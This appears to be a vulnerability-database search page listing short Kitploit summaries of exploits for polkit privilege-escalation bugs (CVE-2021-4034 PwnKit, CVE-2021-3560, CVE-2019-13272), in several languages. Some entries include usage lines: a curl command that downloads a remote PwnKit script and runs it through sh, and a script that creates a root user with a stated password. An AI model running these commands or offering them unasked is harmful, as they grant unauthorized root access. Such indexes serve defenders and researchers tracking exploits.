Lucene search
+L

1791 matches found

Kitploit
Kitploit
added 2026/09/05 1:17 p.m.4 views

PwnKit-CVE-2021-4034-

PwnKit-CVE-2021-4034- Polkit漏洞的重写版本。...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/05 11:44 a.m.3 views

exploit-CVE-2021-3560

Exploit para CVE-2021-3560 Polkit - Escalada local de privilegios ¿Te gusta este repositorio? ¡Danos una ⭐! Solo con fines educativos y de investigación de seguridad autorizada. Autor del exploit @UNICORDev por @NicPWNs y @Dev-Yeoj Descripción de la vulnerabilidad Se descubrió que polkit podía se...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References5
Kitploit
Kitploit
added 2026/09/05 11:18 a.m.5 views

CVE-2021-3560

CVE-2021-3560 基于C语言的可靠CVE-2021-3560漏洞利用程序。 摘要: 昨天我偶然发现了Kevin Backhouse的这篇博客文章(发现了这个漏洞),我尝试了文章中提供的bash命令,令我惊讶的是,它居然在我的Kali Linux机器上生效了! CVE-2021-3560是polkit上的一个身份验证绕过漏洞,它允许无特权的用户通过DBus调用特权方法。该PoC利用此漏洞调用由accountsservice提供的两个特权方法(CreateUser 和 SetPassword),从而允许我们创建一个特权用户并为其设置密码。...

7.8CVSS7.3AI score0.22193EPSS
SaveExploits37References9
Kitploit
Kitploit
added 2026/09/05 11:03 a.m.5 views

CVE-2021-4034

CVE-2021-4034 本仓库包含用于 cve-2021-4034 的单文件漏洞利用程序,该漏洞是 Polkit 本地权限提升漏洞。请谨慎使用! 漏洞描述 CVE-2021-4034,通常被称为 Pwnkit ,是 Polkit 中 pkexec 组件的一个内存损坏漏洞。Polkit 是用于在类 Unix 系统中定义和处理授权的工具包。该漏洞源于对环境变量的不当处理,允许本地用户以 root 用户身份执行任意代码。 核心问题在于 pkexec 在解析环境变量之前未能正确地对其进行清理。这导致在某些情况下出现越界 写入条件,最终允许本地权限提升。该漏洞自 2009 年 pkexec...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/05 10:18 a.m.4 views

CVE-2019-13272

CVE-2019-13272 PTRACETRACEME NOTA: Esta versión en python3 del exploit NO REQUIERE ninguna fuente externa. Las fuentes que siguen son solo créditos para el exploit original en C. Detalles: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 Exposición: altamente probable Etiquetas:...

7.8CVSS7AI score0.52199EPSS
SaveExploits22References2
Kitploit
Kitploit
added 2026/09/05 10:06 a.m.3 views

exploit_CVE-2021-3560

CVE-2021-3560 利用脚本 此脚本利用 polkit 中的 CVE-2021-3560 漏洞实现权限提升至 root。 使用方法 在克隆仓库后,赋予执行权限并运行脚本: root@kitploit: chmod +x exploit.sh ./exploit.sh 预期结果 运行脚本后,将创建一个具有 root 权限的新用户。你可以使用脚本中指定的凭据登录: root@kitploit: ROOTUSER="john" ROOTPASS="john@123" 示例登录 root@kitploit: su john Password: john@123 sudo su whoam...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/05 9:05 a.m.5 views

CVE-2021-4034

CVE-2021-4034 PwnKit 的 PoC:polkit 的 pkexec 中的本地权限提升漏洞 CVE-2021-4034 https://seclists.org/oss-sec/2022/q1/80 https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 PoC 已在 Debian 10 和 CentOS 7 上验证...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/05 9:01 a.m.3 views

Exploiting-PwnKit-CVE-2021-4034-

PwnKit 针对CVE-2021-4034的自包含利用程序 - Pkexec本地权限提升 用法 在基于Ubuntu、Debian、Fedora和CentOS的易受攻击Linux发行版上应可开箱即用。 root@kitploit: sh -c "$curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh" 手动 root@kitploit: curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chm...

7.8CVSS7AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/09/05 8:58 a.m.4 views

CVE-2021-4034

CVE-2021-4034 这是 PwnKit 本地权限提升漏洞 的 PoC,由 Qualys Security Team 发现。 Qualys 研究团队发现 polkit 的 pkexec(一个 SUID-root 程序,默认安装在每个主流 Linux 发行版中)存在内存损坏漏洞。 概念验证 下图展示了该负载在基于 debian 的操作系统中的运行效果 使用方法 提供了两个 PoC,其中一个为自包含版本,不需要在易受攻击的端点(即 GCC)上安装任何依赖。 建议 立即建议移除 polkit 二进制/可执行文件的 SUID 位。...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/05 8:51 a.m.4 views

CVE-2021-3560

CVE-2021-3560 Polkit - 本地权限提升 最初由 kevinbackhouse 在 GitHub Security Lab 发现 参考 https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ https://www.youtube.com/watch?v=QZhz64yEd0g https://ubuntu.com/security/CVE-2021-3560 博客...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/05 7:43 a.m.4 views

CVE-2021-3560_PoC

CVE-2021-3560PoC polkit 漏洞利用脚本 使用 polkit 服务自动提升至 root 权限的脚本 系统要求 SSH 服务器(以避免通过 GNOME 弹出身份验证窗口) 存在漏洞的 Linux 发行版: 发行版| 是否受影响? ---|--- RHEL 7| 否 RHEL 8| 是 Fedora 20(或更早版本)| 否 Fedora 21(或更新版本)| 是 Debian 10(“buster”)| 否 Debian testing(“bullseye”)| 是 Ubuntu 18.04| 否 Ubuntu 20.04| 是 使用指南 root@kitploit:...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/05 6:06 a.m.3 views

CVE-2021-4034

CVE-2021-4034 PoC de Polkit ¿En qué consiste Polkit? Policy Toolkit o Polkit desde que se lanzó en 2009 permite a cualquier atacante sin permisos de root obtener de fácilmente acceso administrativo sobre cualquier sistema de Linux con el paquete de Polkit. Desafortunademente, o no está instalado ...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/05 3:29 a.m.4 views

CVE-2021-4034

CVE-2021-4034 Pkexec 漏洞利用 - 本地权限提升 仅供教育和授权安全研究使用。 原始漏洞利用作者 @arthepsy 漏洞描述 在 polkit 的 pkexec 工具中发现了一个本地权限提升漏洞。pkexec 应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。当前版本的 pkexec 未能正确处理调用参数计数,最终会将环境变量当作命令执行。攻击者可以通过精心构造环境变量来利用此漏洞,诱导 pkexec 执行任意代码。成功执行攻击后,将导致本地权限提升,使非特权用户获得目标机器的管理权限。 使用方法 root@kitploi...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits154References3
Kitploit
Kitploit
added 2026/09/05 1:00 a.m.4 views

CVE-2021-3560

CVE-2021-3560 CTF a simple poc script for polkit PrivEsc vulnerability in ubunutu...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/04 10:40 p.m.3 views

CVE-2021-3560-PolkitPrivilegeEsclation

CVE-2021-3560-Polkit-权限提升 PoC 原始研究由 Kevin Backhouse 完成 这只是一个 Bash PoC 脚本,用于自动化 Kevin Backhouse 博客中提到的利用步骤。 阅读他关于此漏洞的博文:https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ 使用方法 root@kitploit: 使用方法: ./poc.sh -h --help -u=输入自定义用户名(可选) -p=输入自定义密码(可选) -f=y,跳过漏洞检查并强制利用(可选...

7.8CVSS7.8AI score0.22193EPSS
SaveExploits37References3
Kitploit
Kitploit
added 2026/09/04 5:55 p.m.3 views

PwnKit_CVE-2021-4034

PwnKit CVE-2021-4034 的自包含利用程序 - Pkexec 本地权限提升 使用方法 在基于 Ubuntu、Debian、Fedora 和 CentOS 的易受攻击 Linux 发行版上应可直接使用。 root@kitploit: sh -c "$curl -fsSL https://raw.githubusercontent.com/b1gn0se/PwnKitCVE-2021-4034/main/PwnKit.sh" 手动使用 root@kitploit: curl -fsSL...

7.8CVSS7AI score0.94921EPSS
SaveExploits154References1
Kitploit
Kitploit
added 2026/09/04 4:11 p.m.2 views

cve-2021-4034

CVE-2021-4034 - PwnKit(Polkit 本地权限提升) 概述 本仓库包含 CVE-2021-4034 (即 PwnKit)的概念验证代码。仅用于个人学习和教育目的 。请仅在您拥有或明确授权测试的环境中使用。 依赖项 要构建该利用程序,您需要: gcc make nasm ld xxd 描述 pkexec 是 Polkit 的一个实用程序,允许授权用户以另一用户身份执行程序(通常具有管理权限),类似于 sudo。CVE-2021-4034 是一个影响该二进制文件的内存损坏漏洞。问题源于当 argc == 0...

7.8CVSS6.8AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/04 2:17 a.m.5 views

CVE-2021-4034-UniontechOS

CVE-2021-4034-UniontechOS 说明 统信UOS 桌面操作系统,存在CVE-2021-4034漏洞(Linux Polkit本地权限提升漏洞)。...

7.8CVSS7AI score0.94921EPSS
SaveExploits154
Kitploit
Kitploit
added 2026/09/03 10:01 p.m.4 views

POC-Bash-CVE-2021-3560

Bash-CVE-2021-3560 POC Bash -- CVE-2021-3560 Exploit de escalada de privilegios locales en Polkit Este repositorio proporciona un exploit en bash para CVE-2021-3560, una vulnerabilidad de escalada de privilegios locales en polkit que afecta a muchas distribuciones modernas de Linux. !!!!!! En...

7.8CVSS8AI score0.22193EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/03 2:12 a.m.3 views

CVE-2021-4034

CVE-2021-4034 Un simple archivo PWNKIT para convertirte en root. | Solo con fines educativos. ¿Qué es? Es un PWNKIT pre-fabricado y pre-comprimido. ¿Por qué? Estoy trabajando en un script AUTO-PWNKIT para automatizar el pwnkit y usaré este repositorio. Herramienta AutoPwnkit AutoPwnkit:...

7.8CVSS6.7AI score0.94921EPSS
SaveExploits154References2
Rows per page
Query Builder